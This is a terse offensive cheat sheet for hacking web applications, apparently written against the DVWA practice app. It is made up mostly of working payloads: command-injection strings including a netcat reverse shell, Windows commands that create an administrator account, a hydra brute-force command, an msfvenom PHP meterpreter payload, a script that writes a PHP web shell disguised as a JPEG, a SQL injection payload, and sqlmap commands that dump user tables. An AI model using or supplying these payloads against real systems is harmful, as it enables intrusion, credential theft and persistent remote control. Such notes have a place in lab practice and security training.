Hacking Web Applications and Web Servers

Command Execution

Linux

• 127.0.0.1 && ls

• 127.0.0.1 & ls

• 127.0.0.1 & ls

• 127.0.0.1 ; ls

• 127.0.0.1 | ls - with space

• 127.0.0.1 |ls - without space

• 127.0.0.1 && nc -c sh 127.0.0.1 9001

Windows

• hostname

• whoami

• tasklist

• taskkill /PID 3112 /F - forcefully kills the processes

• dir c:\\

• net user

• net user test /add - add a new user

• net localgroup Administrators test /add - add test user to administrators

• net user test - details of the user

• dir c:\\”pin.txt”

• type c:\\”pin.txt”

---

Brute-Forcing

hydra -l admin -P /usr/share/wordlists/john.lst 'http-get-form://127.0.0.1:42001/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\:PHPSESSID=7vs4mhc1q4dnp3f6cgikl01v9q; security=low:F=Username and/or password incorrect’

---

File Upload

• msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php

• exploit.php.img

• GIf89a; - add this line to any file to make it as image file

• use multi/handler

# PHP reverse shell of type image/jpeg
fh = open('shell.php', 'wb')
fh.write(b'\\xFF\\xD8\\xFF\\xE0' + b'<? passthru($_GET["cmd"]); ?>')
fh.close()

---

SQL Injection

Manual

Page not found - HackTricksbook.hacktricks.xyz

• 1’ UNION SELECT user, password FROM users#

Sqlmap

• sqlmap -r req.txt --batch

• sqlmap -r req.txt --batch --level=5 --risk=3

• sqlmap -r req.txt --batch --level=5 --risk=3 --current-db

• sqlmap -r req.txt -D dvwa --tables

• sqlmap -r req.txt -D dvwa -T users --columns

• sqlmap -r req.txt -D dvwa -T users --dump